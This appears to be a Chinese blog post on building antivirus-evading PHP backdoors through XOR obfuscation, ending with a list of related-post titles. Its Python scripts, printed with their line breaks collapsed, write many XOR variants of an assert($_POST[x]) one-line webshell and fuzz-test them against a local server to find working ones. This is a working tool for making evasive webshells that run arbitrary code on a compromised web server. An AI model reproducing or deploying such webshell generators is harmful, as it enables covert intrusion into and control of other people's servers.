python通过异或运算构造无字符后门实现免杀
1.免杀异或shell原理
php异或:
^为异或的符号
( “!” ^ “@” )= ’a’ //两个变量的值进行异或时,会先将两个变量的值转换为ASCII,再将ASCII转换为二进制,对两对二进制数据进行异或,异或完,再将结果转为ASCII,最后将ASCII转为字符串,即为最终结果。注:34+63!=97,一定要用二进制
2.生成Payload代码并有序命名写入文件
import requests
for i in range(1,127):for ii in range(1,127):payload="'"+chr(i)+"'"+'^'+"'"+chr(ii)+"'"code="<?php $a=("+payload+").'ssert';$a($_POST[x]);?>" #<?php assert($_POST[x]);?>#print(code)#将code写入文件filename=str(i)+'xd'+str(ii)+'.php'with open('D:/phpstudy/PHPTutorial/WWW/x/' + filename, 'a+') as f:f.write(code)print('Fuzz->' + filename + '文件写入成功')f.close()
#单线程访问shell文件并提交测试url = 'http://127.0.0.1:8081/x/' +filenamedata = {'x': 'phpinfo();'}result = requests.post(url, data=data).content.decode('utf-8')if 'XIAODI-PC' in result:print('bypass->'+filename+'->ok')print(code)else:print('bypass->'+filename+'->no')
3.多线程实现批量访问shell文件并提交测试是否正常连接回显
import time
import requests
import threading,queue
def bypass_check():while not q.empty():filename = q.get()url = "http://127.0.0.1:8081/x/" + filenamedatas = {'x ': 'phpinfo();'}result = requests.post(url, data=datas).content.decode('utf-8')if "XIAODI-PC" in result:print('check ->' + filename+'->ok')else:print('check ->' + filename + '->no')time.sleep(1)
if __name__ == '__main__':q = queue.Queue()for i in range(1,127):for ii in range(1, 127):payload = "'" + chr(i) + "'" + "^" + "'" + chr(ii) + "'"code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"filename = str(i) + 'xd' + str(ii) + '.php'q.put(filename)with open(' D:/phpstudy/PHPTutorial/WWW/x/' + filename, 'a+') as f:f.write(code)print("Fuzz文件生成成功")for x in range(20):t = threading.Thread(target=bypass_check)t.start()
python通过异或运算构造无字符后门实现免杀相关推荐
- 经典算法之异或运算(无进位相加)
目录 异或运算的定义 异或运算的性质 异或运算的应用 交换两数 翻转指定位 寻找单身狗 异或运算的定义 众所周知,计算机中的所有数据都是以二进制(0或者1)的形式存储.而异或运算符(^)就是将参加运算 ...
- Python通过异或运算对email地址进行解密与加密
不少网页的email地址出于防止收到垃圾邮件的目的,JS脚本里对email做加密保护,仅当在加载页面时才通过JS脚本解密再渲染出来.查看网页源代码可以发现关键词往往是cfemail,其后是一大串十六进 ...
- python中异或运算_Tensorflow轻松实现XOR运算的方式
对于"XOR"大家应该都不陌生,我们在各种课程中都会遇到,它是一个数学逻辑运算符号,在计算机中表示为"XOR",在数学中表示为" ",学名为 ...
- python中异或运算_python – 基于ID列表有效计算XOR(^)校验和的方法
当谷歌搜索有关 Python列表理解的信息时,我获得了一个google foobar挑战,我在过去的几天里一直在慢慢地工作以获得乐趣.最新挑战: 有效地要求生成ID列表,忽略每个新行的增加数字,直到剩 ...
- 浅析无字符数字构造webshell
前言: 之前在命令执行的时候多少学了一点,但发现如果不自己去动手实践一下会忘的很快,这次就来动手实践一番.恰好最近做了很多有关无字符数字的CTF题,恰好可以作为例子说一下. 0x00:转换思想: 如果 ...
- python中异或怎么算_python 异或运算的前提_异或运算公式
Python基础(10)–数字-Python-第七城市 609x288 - 73KB - JPEG Python基础(10)--数字_资讯_突袭网 609x288 - 33KB - JPEG pyth ...
- python异或运算怎么算_小强学Python+OpenCV之-1.4.4掩膜mask及位运算(与、或、非、异或)...
问题引入 在小强学Python+OpenCV之-1.4.2裁剪一节,我们使用的是numpy数组切片功能实现图片区域的裁剪. 那么,如果我们想要裁剪图像中任意形状的区域时,应该怎么办呢? 答案是,使用掩 ...
- python左移右移位运算_荐Python : 位运算 —— 与、或、异或、左移、右移
Python : 位运算 -- 与.或.异或.左移.右移 位运算 位运算是把数字用 二进制 表示之后,对每一位上 0 或者 1 的运算.位运算共有 5 种运算:与.或.异或.左移.右移. 与.或.异或 ...
- python中异或怎么算_python中的异或运算
leetcode上有这么一道题:[136. Single Number] 这个题是给出一个非空列表,里面的元素只有一个只出现了一次,其余都出现了两次,找出这个只出现了一次的元素. 这个题目很简单,写了 ...
最新文章
- 对网络中安全审计产品的理解
- mysql hostname uroot_CACTI网络流量监控
- java复制两个对象报异常_Java中复制两个不同类的对象的属性
- 如何构建一个分布式爬虫:实战篇
- 获取整数的位数_从NMEA0183到GNSS定位数据获取(二)软件篇
- Photoshop脚本指南——Hello World
- 云计算作为当前趋势 能带给你哪些好处?
- element-ui组件中的input等的change事件中传递自定义参数
- 接口规范 9. 推流认证相关接口
- js请求后台接口返回的图片并转为base64
- php常用数组,php常用数组函数
- MAC 外接键盘卡顿处理
- Excel图表美化—表格美化
- 银河麒麟服务器操作系统(Kylin) V10 arm64 飞腾/鲲鹏操作系统下载
- 号外:PPG商标被查封 轻工厂泡沫破灭
- mysql怎么集合查询_MySql集合查询
- Click Once使用总结
- 【微信小程序】wampserver项目:点餐小程序
- C++的substr()函数
- 利用python画梯形图案例